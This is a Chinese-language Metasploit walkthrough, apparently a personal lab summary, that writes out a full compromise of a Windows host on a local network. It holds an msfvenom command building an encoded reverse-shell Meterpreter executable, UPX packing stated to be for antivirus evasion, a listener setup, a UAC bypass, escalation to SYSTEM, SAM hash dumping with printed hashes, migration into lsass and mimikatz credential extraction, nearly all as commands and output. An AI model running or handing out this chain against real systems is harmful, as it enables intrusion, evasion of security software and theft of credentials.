metasploit渗透主机总结

#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
#upx payload.exe //给payload.exe加壳，防止被杀毒软件直接杀掉。
#python -m http.server 80

#msfconsole
sf6 > use exploit/multi/handler
sf6 > set lhost 192.168.0.150
sf6 > set lport 4444
sf6 > set payload windows/meterpreter/reverse_tcp
sf6 > run

meterpreter > background

sf6 > use exploit/windows/local/ask
msf6 exploit(windows/local/ask) > set session 1

msf6 exploit(windows/local/ask) > set filename payload.exe
msf6 exploit(windows/local/ask) > exploit
[*] Started reverse TCP handler on 192.168.0.150:4444 
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading payload.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (175174 bytes) to 192.168.0.106
[*] Meterpreter session 2 opened (192.168.0.150:4444 -> 192.168.0.106:12695 ) at 2022-06-13 21:50:08 +0800
meterpreter > getuid
Server username: DESKTOP-9A8VFKB\xiang
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

meterpreter > run windows/gather/credentials/windows_autologin
[*] Running against DESKTOP-9A8VFKB on session 1
[*] The Host DESKTOP-9A8VFKB is not configured to have AutoLogon password
提示这证明本机并没有配置自动登录
还可以通过导出SAM数据库中的本地用户账号（注意需要提权到SYSTEM）
提权
meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against DESKTOP-9A8VFKB
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20220614105643_default_192.168.0.106_windows.hashes_879156.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hints...
[*]     No users with password hints on this system
[*]     Dumping password hashes...
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[+]     DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[+]     WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[+]     xiang:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

meterpreter >run hashdump

meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
 PID PPID Name   Arch Session User                                             Path
 ---  ----  ----     ----   ------- ----                                              ----
 744 652  lsass.exe x64   0    NT AUTHORITY\SYSTEM       C:\Windows\System32\lsass.exe
meterpreter > migrate 744
[*] Migrating from 9704 to 744...
[*] Migration completed successfully.

#load kiwi

#creds_all
meterpreter > creds_all 
[+] Running as SYSTEM
[*] Retrieving all credentials
meterpreter > kiwi_cmd sekurlsa::logonpasswords